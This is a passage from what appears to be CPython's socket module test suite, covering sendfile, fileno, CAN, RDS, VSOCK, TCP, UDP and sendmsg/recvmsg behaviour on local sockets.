self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
